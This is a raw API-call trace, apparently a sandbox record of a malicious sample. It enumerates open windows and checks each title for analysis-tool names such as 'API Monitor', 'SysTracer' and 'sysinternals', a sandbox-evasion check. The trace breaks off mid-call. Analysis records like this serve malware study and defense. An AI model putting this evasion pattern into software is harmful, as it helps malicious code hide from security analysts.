lstrcpynA (in: lpString1=0x341200, lpString2="CFD File Open Message Window", iMaxLength=1024 | out: lpString1="CFD File Open Message Window") returned="CFD File Open Message Window" [0158.724] lstrcpyA (in: lpString1=0x430c00, lpString2="CFD File Open Message Window" | out: lpString1="CFD File Open Message Window") returned="CFD File Open Message Window" [0158.724] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131618") returned 6 [0158.724] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.724] strstr (_Str="C", _SubStr="- main thread") returned 0x0 [0158.724] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.724] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.724] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.724] strstr (_Str="C", _SubStr="API Monitor") returned 0x0 [0158.725] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.725] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.725] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.725] strstr (_Str="C", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.725] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.725] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.725] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.725] strstr (_Str="C", _SubStr="sysinternals") returned 0x0 [0158.725] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.725] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.726] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.726] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.726] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="197134") returned 6 [0158.726] lstrcpyA (in: lpString1=0x430400, lpString2="197134" | out: lpString1="197134") returned="197134" [0158.726] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.727] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.727] GetWindowTextA (in: hWnd=0x3020e, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.727] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.727] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.727] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.727] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="197134") returned 6 [0158.727] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.727] GetClassNameA (in: hWnd=0x3020e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="MsoStdCompMgr") returned 13 [0158.727] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.727] lstrcpynA (in: lpString1=0x341200, lpString2="MsoStdCompMgr", iMaxLength=1024 | out: lpString1="MsoStdCompMgr") returned="MsoStdCompMgr" [0158.727] lstrcpyA (in: lpString1=0x430c00, lpString2="MsoStdCompMgr" | out: lpString1="MsoStdCompMgr") returned="MsoStdCompMgr" [0158.727] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="197134") returned 6 [0158.728] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.728] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.728] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.728] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.728] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.728] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.728] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.728] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.728] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.729] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.729] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.729] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.729] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.729] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.729] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.729] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.729] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.729] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.729] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.729] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.729] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65978") returned 5 [0158.729] lstrcpyA (in: lpString1=0x430400, lpString2="65978" | out: lpString1="65978") returned="65978" [0158.729] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.729] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.729] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.730] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.730] GetWindowTextA (in: hWnd=0x101ba, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.730] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.730] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.730] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.730] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65978") returned 5 [0158.730] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.730] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.730] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.730] GetClassNameA (in: hWnd=0x101ba, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="XLMAIN") returned 6 [0158.730] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.730] lstrcpynA (in: lpString1=0x341200, lpString2="XLMAIN", iMaxLength=1024 | out: lpString1="XLMAIN") returned="XLMAIN" [0158.730] lstrcpyA (in: lpString1=0x430c00, lpString2="XLMAIN" | out: lpString1="XLMAIN") returned="XLMAIN" [0158.730] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65978") returned 5 [0158.730] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.731] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.731] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.731] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.731] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.731] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.731] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.731] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.731] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.731] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.732] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.732] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.732] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.732] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.732] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.732] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.732] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.732] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.732] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.732] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.732] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65976") returned 5 [0158.732] lstrcpyA (in: lpString1=0x430400, lpString2="65976" | out: lpString1="65976") returned="65976" [0158.732] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.732] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.732] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.732] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.733] GetWindowTextA (in: hWnd=0x101b8, lpString=0x340df8, nMaxCount=1024 | out: lpString="OfficePowerManagerWindow") returned 24 [0158.733] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.733] lstrcpynA (in: lpString1=0x3401e0, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] lstrcpyA (in: lpString1=0x430800, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65976") returned 5 [0158.733] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.733] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.733] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.733] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0158.733] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.733] lstrcpynA (in: lpString1=0x341200, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] lstrcpyA (in: lpString1=0x430c00, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65976") returned 5 [0158.733] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.733] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.734] strstr (_Str="OfficePowerManagerWindow", _SubStr="- main thread") returned 0x0 [0158.734] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.734] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.734] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.734] strstr (_Str="OfficePowerManagerWindow", _SubStr="API Monitor") returned 0x0 [0158.734] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.734] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.734] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.734] strstr (_Str="OfficePowerManagerWindow", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.734] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.734] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.735] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.735] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.735] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.735] strstr (_Str="OfficePowerManagerWindow", _SubStr="sysinternals") returned 0x0 [0158.735] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.735] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.735] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.735] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.735] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131504") returned 6 [0158.735] lstrcpyA (in: lpString1=0x430400, lpString2="131504" | out: lpString1="131504") returned="131504" [0158.735] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.735] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.735] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.735] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.735] GetWindowTextA (in: hWnd=0x201b0, lpString=0x3401e0, nMaxCount=1024 | out: lpString="GDI+ Window") returned 11 [0158.736] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.736] lstrcpynA (in: lpString1=0x340df8, lpString2="GDI+ Window", iMaxLength=1024 | out: lpString1="GDI+ Window") returned="GDI+ Window" [0158.736] lstrcpyA (in: lpString1=0x430800, lpString2="GDI+ Window" | out: lpString1="GDI+ Window") returned="GDI+ Window" [0158.736] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131504") returned 6 [0158.736] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.736] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.736] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.736] GetClassNameA (in: hWnd=0x201b0, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="GDI+ Hook Window Class") returned 22 [0158.736] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.736] lstrcpynA (in: lpString1=0x341200, lpString2="GDI+ Hook Window Class", iMaxLength=1024 | out: lpString1="GDI+ Hook Window Class") returned="GDI+ Hook Window Class" [0158.736] lstrcpyA (in: lpString1=0x430c00, lpString2="GDI+ Hook Window Class" | out: lpString1="GDI+ Hook Window Class") returned="GDI+ Hook Window Class" [0158.736] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131504") returned 6 [0158.736] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.736] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.736] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.737] strstr (_Str="GDI+ Window", _SubStr="- main thread") returned 0x0 [0158.737] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.737] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.737] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.737] strstr (_Str="GDI+ Window", _SubStr="API Monitor") returned 0x0 [0158.737] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.737] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.737] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.737] strstr (_Str="GDI+ Window", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.737] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.737] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.738] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.738] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.738] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.738] strstr (_Str="GDI+ Window", _SubStr="sysinternals") returned 0x0 [0158.738] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.738] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.738] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.738] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.738] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131498") returned 6 [0158.738] lstrcpyA (in: lpString1=0x430400, lpString2="131498" | out: lpString1="131498") returned="131498" [0158.738] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.738] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.738] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.738] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.738] GetWindowTextA (in: hWnd=0x201aa, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.738] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.739] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.739] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.739] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131498") returned 6 [0158.739] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.739] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.739] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.739] GetClassNameA (in: hWnd=0x201aa, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="ARC Window Class") returned 16 [0158.739] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.739] lstrcpynA (in: lpString1=0x341200, lpString2="ARC Window Class", iMaxLength=1024 | out: lpString1="ARC Window Class") returned="ARC Window Class" [0158.739] lstrcpyA (in: lpString1=0x430c00, lpString2="ARC Window Class" | out: lpString1="ARC Window Class") returned="ARC Window Class" [0158.739] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131498") returned 6 [0158.739] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.739] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.739] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.739] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.740] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.740] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.740] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.740] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.740] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.740] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.740] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.740] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.740] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.740] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.740] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.741] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.741] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.741] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.741] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.741] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.741] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.741] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.741] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65944") returned 5 [0158.741] lstrcpyA (in: lpString1=0x430400, lpString2="65944" | out: lpString1="65944") returned="65944" [0158.741] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.741] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.741] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.741] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.741] GetWindowTextA (in: hWnd=0x10198, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Psychology Leaving Examinations") returned 31 [0158.741] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.742] lstrcpynA (in: lpString1=0x340df8, lpString2="Psychology Leaving Examinations", iMaxLength=1024 | out: lpString1="Psychology Leaving Examinations") returned="Psychology Leaving Examinations" [0158.742] lstrcpyA (in: lpString1=0x430800, lpString2="Psychology Leaving Examinations" | out: lpString1="Psychology Leaving Examinations") returned="Psychology Leaving Examinations" [0158.742] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65944") returned 5 [0158.742] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.742] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.742] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.742] GetClassNameA (in: hWnd=0x10198, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="psychology_leaving_examinations_window") returned 38 [0158.742] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.742] lstrcpynA (in: lpString1=0x341200, lpString2="psychology_leaving_examinations_window", iMaxLength=1024 | out: lpString1="psychology_leaving_examinations_window") returned="psychology_leaving_examinations_window" [0158.742] lstrcpyA (in: lpString1=0x430c00, lpString2="psychology_leaving_examinations_window" | out: lpString1="psychology_leaving_examinations_window") returned="psychology_leaving_examinations_window" [0158.742] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65944") returned 5 [0158.742] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.742] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.742] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.742] strstr (_Str="Psychology Leaving Examinations", _SubStr="- main thread") returned 0x0 [0158.743] wsprintfA (in: 